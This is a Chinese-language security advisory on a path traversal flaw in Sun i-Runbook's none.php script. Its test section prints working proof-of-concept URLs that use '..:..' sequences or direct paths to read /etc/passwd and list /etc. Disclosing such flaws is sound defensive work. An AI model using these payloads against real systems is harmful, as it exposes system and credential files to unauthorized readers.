发布日期：2002-07-11
更新日期：2002-07-18

受影响系统：

Sun i-Runbook

描述：

---

BUGTRAQ  ID: 5209
CVE(CAN) ID: CVE-2002-1033,CVE-2002-1034

Sun i-Runbook是一款设计用于为SUN环境提供基于WEB的技术和管理规程的系统，i-Runbook提供WEB接口。

Sun i-Runbook的WEB接口对用户提交的URL请求缺少正确过滤，远程攻击者可以利用此漏洞提交畸形URL请求以WEB进程的权限查看系统中任意文件内容。

Sun i-Runbook包含的none.php脚本对用户提交的数据缺少正确处理，攻击者可以提交包含多个"..:.."字符，并追加想要查看的系统文件名或目录，服务程序在解析这个请求时由于处理错误会返回包含请求文件和目录的信息；另外，通过直接请求相关的系统文件名或者目录，服务程序也会直接返回文件或目录内容。

<*来源：JWC （JWC@portcullis-security.com）
  
  链接：http://archives.neohapsis.com/archives/bugtraq/2002-07/0107.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

JWC （JWC@portcullis-security.com）提供了如下测试方法：

查看passwd文件：

http://>/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:

或者

http://>/content/base/build/explorer/none.php?/etc/passwd

查看/etc目录信息：

http://>/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:

或者：

http://>/content/base/build/explorer/none.php?/etc/

建议：

---

厂商补丁：

Sun
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.sun.co.uk/consulting/sunpro/pdf/irunbook-4.pdf

浏览次数：2711
严重程度：0（网友投票）